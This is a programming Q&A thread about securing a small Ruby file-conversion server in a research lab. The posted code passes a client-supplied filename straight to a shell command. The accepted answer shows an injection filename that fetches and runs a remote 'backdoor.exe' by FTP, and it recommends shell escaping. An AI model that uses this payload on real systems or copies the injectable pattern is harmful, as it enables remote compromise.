# Should I Take Security Measures for a Small, Single-Service Server?

Tags: ruby, security

I have some experience with programming, but I have very little experience when it comes to the security of programs. I've written a single-service server in Ruby which runs on a Windows XP computer to be used by a Linux computer in the same lab. The lab network is also behind a firewall, so there might not be a problem there, but I really have no idea. Below is the code for the server. All it does is take a .raw file, runs msconvert.exe to convert it into an mzML file, and then sends back the mzML file.

```
require 'socket'

server = TCPServer.open(2000)
loop {
  client = server.accept

  filename = client.gets.chomp
  puts "Reading contents of #{filename}.raw"
  raw_data = client.gets("\r\r\n\n").chomp("\r\r\n\n")
  File.open(filename + ".raw", 'wb') {|out| out.print raw_data}
  puts "Converting #{filename}"

  #It's lame to have a script run a script, but it's the only way to get this to work.
  system "scriptit.bat " + filename + ".raw"

  puts "Sending contents of #{filename}.mzML"
  client.print IO.read(filename + ".mzML")
  client.print "\r\r\n\n"
  puts "Done"
  client.close # Disconnect from the client
}
```

Should I do something to make this more secure, or do I not need to worry about it?

Comment: "but I really have no idea"  Famous last words.  You really need to talk with your security people to find out what -- if anything -- you need to be concerned about.  If you don't have security people, you need to find some or find someone who can hire some.  "I really have no idea" makes it impossible to answer your question.

Comment: Yes, at least better than that. BTW, what is the server's IP? :)

Comment: @S.Lott - Security people? This isn't a company, it's a proteomics research lab.

Comment: You have computers.  You have a connection to the internet.  If you don't have *someone* who's in charge of security then your computer is probably just a spambot.  Again,  "I really have no idea" makes it impossible to answer your question.

Answer (score 3, accepted):

If an attacker supples a `filename` of `|| ftp ftp://host/backdoor.exe || backdoor.exe ||`  he will be able to infect your server.

In order to patch this server you need to use [Escape.shell_command()](http://blog.littleimpact.de/index.php/2008/08/11/avoiding-shell-injection-in-ruby-python-and-php/).

Comment: Not if `scriptit.bat` needs arguments and returns an exit code that is not zero. `||` would work better.

Comment: `scriptit.bat` takes as its input `filename.raw`. Currently it doesn't return an error code, it just dies.

Answer (score 1):

Well, if your Windows server is only used by your lab computers, I would say it is sufficient if you configure the firewall so that nobody can access the server from the outside.

Answer (score 0):

If the system is exposed to anything public (the internet, etc.) then security is very important. Some people really enjoy the challenge of breaking systems.

Comment: Well, it uses TCP, so I think that means Internet connection (I'm not positive though; can't recall the difference between all these protocols).

Comment: @Jesse:  TCP is a very commonly used Internet protocol, but it's usable on various types of networks, including subnets that aren't connected to the Internet.  If you have a firewall, that suggests that your server probably can't be accessed easily from the Internet.  Yes, I'm using weasel words, but I can't be more specific without more knowledge.

Comment: To give an more common analogy TCP is the language you're speaking on a phone call, not who you're speaking to. The important thing here is who you're talking to. If untrustworthy people can access your server then you must lock it. If you're sure it's not connected to, or physically accessible, by the outside world then you're pretty safe.